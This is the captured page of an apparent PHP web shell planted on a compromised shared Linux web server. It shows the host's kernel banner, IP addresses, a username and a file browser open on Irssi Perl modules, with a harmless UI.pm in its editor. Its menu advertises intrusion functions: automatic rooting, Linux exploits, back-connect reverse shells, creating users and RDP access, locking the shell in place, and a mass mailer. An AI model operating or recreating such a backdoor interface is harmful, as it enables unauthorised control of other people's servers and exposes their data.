Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
x86_64-linux-gnu /
perl5 /
5.34 /
Irssi /
[ HOME SHELL ]
Name
Size
Permission
Action
Irc.pm
359
B
-rw-r--r--
TextUI.pm
368
B
-rw-r--r--
UI.pm
434
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : UI.pm
# # Perl interface to irssi functions. # package Irssi::UI; use strict; use vars qw($VERSION @ISA @EXPORT @EXPORT_OK); $VERSION = "0.9"; require Exporter; require DynaLoader; sub Irssi::UI::Window::create_handle { goto &Irssi::create_window_handle; } @ISA = qw(Exporter DynaLoader); @EXPORT = qw(); @EXPORT_OK = qw(); bootstrap Irssi::UI $VERSION if (!Irssi::Core::is_static()); Irssi::UI::init(); Irssi::EXPORT_ALL(); 1;
Close